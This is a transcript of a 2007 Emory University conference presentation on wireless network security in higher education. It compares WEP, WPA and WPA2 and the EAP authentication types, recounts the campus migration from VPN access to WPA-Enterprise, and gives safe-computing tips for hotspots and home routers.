Presentation is loading. Please wait.

Presentation is loading. Please wait.

Emory Network Communications Wireless Security In an Education Environment Stan Brooks CWNA, CWSP Emory University Network Communications Division

Similar presentations

Presentation on theme: "Emory Network Communications Wireless Security In an Education Environment Stan Brooks CWNA, CWSP Emory University Network Communications Division"— Presentation transcript:

1 Emory Network Communications Wireless Security In an Education Environment Stan Brooks CWNA, CWSP Emory University Network Communications Division AIM-Y!-MSN: WLANstan Copyright Stan Brooks 2007. This work is the intellectual property of the author. Permission is granted for this material to be shared for non-commercial, educational purposes, provided that this copyright statement appears on the reproduced materials and notice is given that the copying is by permission of the author. To disseminate otherwise or to republish requires written permission from the author.

2 Emory Network Communications Outline What this presentation will not cover Not a how-to hacking/cracking course Not a wireless basics discussion Not a deep dive on WLAN protocols Wireless Security Why do we need security on wireless networks? Wireless Security Basics Wireless Security History Choosing a Wireless Security Model Implementing Wireless Security Migrating Security Models – A real-life story Protecting yourself – Safe Wireless Computing At Wi-Fi Hotspots and at Home

3 Emory Network Communications Why Do We Need Security on WLANs? Easy to eavesdrop (sniff) Easy to spoof MAC addresses Easy to hack/crack Pre-Shared Keys (WEP, WPA-PSK) Rogue APs Evil Twin & Man-in-the-Middle (MitM) Attacks Last 100 feet is the worst of all Much less secure than even wired Internet access There is good news – Wireless CAN be more secure than the wired network (if implemented properly) Internal Network Real Access Point Real Wireless User Evil Twin/MitM Access Point Rogue Access Point Sniff the Air (Eavesdrop) Unauthorized Access AP Impersonation Internet X

4 Emory Network Communications Wireless Security – What do we Protect? There 3 areas that need protection: 1)Protect data as it travels from source to destination Eavesdropping Integrity (tampering) Denial of Service (DoS) 2)Protect the network from unauthorized/compromised users Rogue APs Stolen/hacked credentials Client remediation (NAC/NAP/etc.) 3)Protect the client from unauthorized access MitM/Evil Twin and Ad Hoc attacks Hacking open hard drive shares Network Wireless User Access Point

5 Emory Network Communications Security PROCESS Security is a PROCESS Apply Security in Layers There is NO single security silver bullet Different data require different levels of security A Term Paper vs. Student Grades vs. Financial Aid Data vs. Health Records Different users need different levels of access Student vs. Faculty vs. Guest Users A Business Risk Assessment helps to define requirements

6 Emory Network Communications Security Policy Wireless Security SHOULD be part of your Overall Security Policy Acceptable Use Policy, Terms of Service (AUP/ToS) Policy should address the 3 areas to protect outlined on a previous slide Role-based Access Control All users are NOT created equal Student vs. Faculty vs. Staff vs. Guest All data are NOT created equal Term papers vs. grade reports vs. medical records Security Policy also defines how the network is accessed Type of Hardware and what type of support Supported OSs Access methods

7 Emory Network Communications AAA (or AAAA) Originated with dial-up Internet and VPN access RADIUS = Remote Dial-In User Service Authentication (Username/Password) Who are you? Authorization (Are you a valid user/subscriber) Are you allowed to log on the network? Access Control (Added for RBAC & Wireless) Where can you go once you are on the network? (Accounting) – Originally the 3 rd A Logs Billing Tracking usage For when the RIAA or MPAA comes around

8 Emory Network Communications Authentication in a Wireless Environment Types of Wireless Security Models Open System Shared Key for Encryption & Authentication Static Key ( WEP, WPA / WPA2-PSK) Dynamic Key ( Dynamic WEP, WPA / WPA2-Enterprise) Authentication Models Open System VPN 802.1x (WPA / WPA2 or wired) – Needs a RADIUS Server Guest Access Captive Portal, Walled Garden, Other

9 Emory Network Communications Wi-Fi Security Evolution Authentication EncryptionWEP Dynamic WEP TKIP AESVPN SSIDCaptive Portal802.1x802.11i Easily hacked by children, no real security, just a no-trespassing sign Requires a Webserver and may compromise username/pw. Data encryption at the expense of authentication and may requires client software Uses EAP (EAP-TLS, EAP- TTLS, PEAP, LEAP, etc.). Requires a RADIUS Server. Dynamic WEP is fairly secure, TKIP is much better, addressing all known issues w/WEP (also called WPA2) Combines 802.1x Authentication (EAP-TLS, EAP-TTLS, PEAP, LEAP, etc.) with AES encryption

10 Emory Network Communications WEP / WPA / WPA2 Basics WEPWPA-PersonalWPA-EnterpriseWPA2-PersonalWPA2-Enterprise Encryption RC4 w/WEP 24-bit IV 40/104-bit Key RC4 w/TKIP 48-bit IV 128-bit Key RC4 w/TKIP 48-bit IV 128-bit Key AES-CCMP 48bit-IV 128bit Key AES-CCMP 48bit-IV 128bit Key Integrity CRCMichael 64-bit Key Michael 64-bit Key CBC-MAC 128-bit Key CBC-MAC 128-bit Key Authentication Optional Shared Key PSK – Pre-Shared Key 802.1x Various EAP-Types PSK – Pre-Shared Key 802.1x Various EAP-Types Ad-Hoc Support YesNo YesNo Standard Part of 802.11b 1999 Snapshot of 802.11i As of 10/2002 Snapshot of 802.11i As of 10/2002 Specified in 802.11i Ratified 06/2004 Specified in 802.11i Ratified 06/2004

11 Emory Network Communications WPA / WPA2 Enterprise (8021.x) Elements Supplicant (the client) Authentication Server (RADIUS server) Authenticator (the AP or WLAN Controller) Passes authentication transaction between the Supplicant and the Authentication Server Authentication Server (RADIUS) Authenticator (Access Point) Supplicant (Client) Network

12 Emory Network Communications WPA / WPA2-Enterprise EAP-Types SourceClientServer AuthClient AuthVulnerability Level Vulnerability Examples EAP-MD5 Open – NOT Wi-Fi Certified Aegis, OdysseyShared Key Challenge - NO KEY DERIVATION NoneExtremely HighOffline Dictionary Attacks LEAP Cisco Proprietary, NOT Wi-Fi Certified Cisco (CCX), Aegis, Odyssey Password Hash HighASLEAP – Identity Exposure & Offline Dictionary PW Attacks EAP-FAST Cisco Proprietary, NOT Wi-Fi Certified OdysseyPAC (Shared Key)MSCHAPv2MediumPAC Exposure TLS Open, Wi-Fi CertifiedAegis, OdysseyCertificate (PKI) LowLost or Stolen Devices TTLS (PAP, CHAP, MSCHAPv2, or GTC) Open, Wi-Fi CertifiedAegis, Odyssey, T- Mobile Conn Mgr (PCTEL) CertificatePAP, CHAP, MSCHAPv2, GTC MediumPossible Identity Exposure, MitM Risks PEAPv0 (TLS or MSCHAPv2) Microsoft – Wi-Fi Certified Microsoft WZC, Apple, Aegis, Odyssey CertificateEAP-TLS (SmartCard), MSCHAPv2 MediumPossible Identity Exposure, MitM Risks PEAPv1 (EAP- GTC) Cisco – Wi-Fi CertifiedCisco, Aegis, Odyssey CertificateEAP-GTC (Generic Token Card) MediumPossible Identity Exposure, MitM Risks EAP-SIM GSM Wireless Carriers – Wi-Fi Certified OdysseySmartCard MediumGSM/GPRS Attacks Note: Aegis Client by Meetinghouse, Odyssey Client by Funk/Juniper Networks

13 Emory Network Communications Choosing the Right EAP-type What EAP-types does your client base support? Homogeneous or heterogeneous environment Machine or user authentication – or both? Do you control the clients? Do you support PKI? What clients are you willing to support, and at what level? What EAP-Types does your authentication server(s) support? RADIUS server supported EAP-types RADIUS proxy capabilities to your back-end credential base Back-end directory/database capabilities How are passwords stored? Proxy capabilities Back-end directory rights

14 Emory Network Communications Wireless Clients PCs Microsoft Windows XP WZC Wireless chip manufacturers clients Atheros Intel Broadcom Prism Open Source SecureW2 wEAP Funk/Juniper Odyssey Meetinghouse/Cisco Aegis VPN Clients Microsoft PPTP, IPSec Checkpoint Others MACs Linux wpa_supplicant Xsupplicant PDAs Native OS support Funk/Juniper Odyssey Meetinghouse/Cisco Aegis Wi-Fi & Dual Mode Phones Other Devices Game Consoles TiVo Appliances Nabaztag Wi-Fi Rabbit

15 Emory Network Communications Implementing a Secure Wireless Infrastructure Basic Tenet: Wireless network should be considered UNTRUSTED Wireless traffic should be scrutinized and controlled just like Internet traffic, perhaps more so. Difficult to build & scale an effective secure architecture with stand-alone APs Expanding VLANs across the campus Backhauling wireless traffic to a firewall or wireless gateway Managing APs, switches, & routers Im an unabashed WLAN Switch/Controller proponent Much easier to implement security model(s) Easier to deploy, manage, & troubleshoot

16 Emory Network Communications Aruba WLAN Switch/Controller-based Implementation The AP attaches to network infrastructure and gets its configuration from the Aruba WLAN switch/controller The AP builds tunnel to the Aruba WLAN switch/controller An Authenticated user associates to AP; all traffic is tunneled to controller where it is scrutinized and passed or blocked to various destinations including the Internet A Guest user associates to AP; all traffic is tunneled to controller, scrutinized and forwarded to the Internet as policy dictates Using a centralized controller gives a single point of ingress and control for wireless traffic on the wired network Authenticated User SSID: EmoryUnplugged Emorys Internal Network Aruba WLAN Switch/Controller w/ Built in Firewall and Per User Access Control Internet Guest User SSID: EmoryGuest Thin Access Point

17 Emory Network Communications Migrating to New Security Models Some History Emory originally settled on an Open System/VPN authentication/access Model in 2004 As we grew, VPN was OK, but not great The user experience with the VPN was sub-optimal Directive to move to WPA-Enterprise given Spring 2006 Directive for completion by January 1, 2007

18 Emory Network Communications Changing Security Models Least impact on clients Clients DO have to change Plan a transition period Longer (with in reason) is better A natural calendar break is ideal for cut-over Emory used Winter Break 06 as the cut-over Run both models for the transition period Market, market, market the change and why its better

19 Emory Network Communications Poster Example

20 Emory Network Communications Poster/Ad Example

21 Emory Network Communications Emorys Transition Timeline Fall 2005 – Started piloting new model Developed configuration handouts and tools January 2006 – Started officially supporting new model Spring Semester 2006 (Jan-May) Marketed change (posters, student newspaper ads) Held clinics to get users transitioned End of semester – Email blast informing students of impending change in Fall 2006 Fall Semester 2006 (Sept-Dec) Removed old security model from ResNet areas Move in weekend required lots of hands on configuration help for students Held additional configuration clinics in high use areas Mid & Late Semester – Email blasts to know users of old security model informing them of model sunset Winter Break 2006 – Removed old security model access globally Result: No logged complaints

22 Emory Network Communications VPN Usage Graph Oct 2005 to Feb 2007 Thanksgiving 2005 Winter Break 2005 Spring Break 2006 Summer Break 2006 Move-in Weekend 2006 Thanksgiving 2006 Winter Break 2006

23 Emory Network Communications Wireless Security – Protecting Yourself There 3 main areas to address: 1)Protect data as it travels from source to destination 2)Protect the client from unauthorized access 3)Protect the network from unauthorized/compromised users Internet Real Wireless User Real Access Point

24 Emory Network Communications Safe HotSpot Wireless Computing Assume the network connection is HOSTILE - practice safe computing! Enable/use Personal Firewalls Properly configured for Internet or untrusted connection Configure your Wireless Client Do NOT connect to non-preferred wireless networks Do NOT automatically connect to an open wireless network – Set client to ask you (On Demand/Manual) No Ad-Hoc Networks (Ad-Hoc networks are REALLY BAD) Encrypt your traffic WPA / WPA2-Enterprise (probably not available at hotspots) VPNs Your organizations VPN – PPTP, IPSec, or SSL VPNs Public VPN Gateways such as SpotLock Remember: HTTP, POP3, IMAP, FTP, Telnet and other protocols send credentials and data as clear text, so encrypt to be safe!

25 Emory Network Communications Safe SOHO Wireless Computing On your clients: Do NOT connect to non-preferred wireless networks No Ad-Hoc Networks (Ad-Hoc networks are REALLY BAD) On your router: Please. Please, Please - Change your routers default configuration CHANGE THE PASSWORD FROM THE DEFAULT Change the SSID from the default Choose an SSID that does not identify you or your geographic location Set the channel to 1, 6, or 11 to reduce interference Read the directions and set up WPA-PSK or WPA2-PSK Choose a difficult to guess and long (32+ character) passphrase that has upper/lower case, numbers, and punctuation. Example: Emory\University/Rox*My smallW0RLD!!!Yeah! WPA-PSK can be subject to dictionary attacks, so misspelled words, added punctuation and longer keys will help mitigate this type of attack – just make it easy for YOU to remember

26 Emory Network Communications Recap Why we need security for wireless networks Different security models Strengths & weaknesses Implementation Migrating to a New Security Model Basic wireless security methods for home and hotspots

27 Emory Network Communications ? Questions & Discussion Wireless Security In an Education Environment Presentation Evaluation URL:

28 Emory Network Communications Bibliography & Resources CWNP –Certified Wireless Network Professional Program Best program for learning ALL about WLANs Books Real 802.11 Security, Wi-Foo, CWNA/CWSP/CWAP Study Guides, Hacking Wireless Networks for Dummies Websites, and others (hit the forums for good information) Manufacturers Cisco, Aruba, Meru, Trapeze

Download ppt "Emory Network Communications Wireless Security In an Education Environment Stan Brooks CWNA, CWSP Emory University Network Communications Division"

Similar presentations

Ads by Google